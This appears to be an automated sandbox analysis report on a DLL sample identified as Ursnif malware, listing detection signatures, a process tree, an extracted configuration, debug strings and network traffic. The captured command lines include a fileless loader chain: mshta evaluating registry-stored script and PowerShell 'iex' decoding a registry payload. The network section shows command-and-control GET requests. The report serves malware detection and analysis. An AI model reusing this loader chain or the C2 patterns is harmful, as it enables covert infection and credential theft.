Loading ...

Play interactive tourEdit tour

Analysis Report yytr.dll

Overview

General Information

Sample Name:yytr.dll
Analysis ID:350433
MD5:ba2befa9c70c2b6d779c48a59cece3e5
SHA1:4c855f80076e357d35c7d60cd52d2c49abefc5ff
SHA256:9c51cbe4681facc34623aeca27a18dbaa6db1337990a0e003b7c9babeb06c1eb

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Contains functionality to detect sleep reduction / modifications
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5964 cmdline: loaddll32.exe 'C:\Users\user\Desktop\yytr.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • rundll32.exe (PID: 4576 cmdline: rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • control.exe (PID: 5656 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 6556 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5952 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5988 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5920 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4596 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6788 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 2628 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5040 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6564 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5604 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@618321hh", "dns": "618321", "version": "250177", "uptime": "372", "crc": "2", "id": "3131", "user": "4229768108f8d2d8cdc8873a70351dbe", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 14 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4552, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', ProcessId: 5040
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 4552

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: loaddll32.exe.5964.0.memstrMalware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@618321hh", "dns": "618321", "version": "250177", "uptime": "372", "crc": "2", "id": "3131", "user": "4229768108f8d2d8cdc8873a70351dbe", "soft": "3"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: yytr.dllVirustotal: Detection: 43%Perma Link
            Source: yytr.dllReversingLabs: Detection: 39%
            Machine Learning detection for sampleShow sources
            Source: yytr.dllJoe Sandbox ML: detected
            Source: 0.2.loaddll32.exe.f50174.3.unpackAvira: Label: TR/Kazy.4159236
            Source: 1.2.rundll32.exe.4520174.4.unpackAvira: Label: TR/Kazy.4159236

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: yytr.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Uses secure TLS version for HTTPS connectionsShow sources
            Source: unknownHTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
            Source: Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
            Source: Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
            Source: Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB9064 RegisterDeviceNotificationA,37_2_04DB9064
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_004051E8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F37AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_02F37AA8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_004051E8
            Source: C:\Windows\explorer.exeCode function: 37_2_04DBA0C4 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,37_2_04DBA0C4
            Source: C:\Windows\explorer.exeCode function: 37_2_04DBEEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,37_2_04DBEEAC
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB537C FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege,37_2_04DB537C

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.67.231.135: -> 192.168.2.4:
            Source: Joe Sandbox ViewASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
            Source: Joe Sandbox ViewJA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB2690 InternetReadFile,37_2_04DB2690
            Source: global trafficHTTP traffic detected: GET /manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: PHPSESSID=eshdo6go4uelgf2o7eta3f2t14; lang=en
            Source: global trafficHTTP traffic detected: GET /manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: lang=en
            Source: global trafficHTTP traffic detected: GET /manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: lang=en
            Source: unknownDNS traffic detected: queries for: assets.onestore.ms
            Source: loaddll32.exe, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: powershell.exe, 0000001E.00000003.825326086.0000026F5A0BB000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
            Source: WerFault.exe, 00000004.00000003.659243979.0000000005012000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
            Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000001E.00000002.894428484.0000026F5BAB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
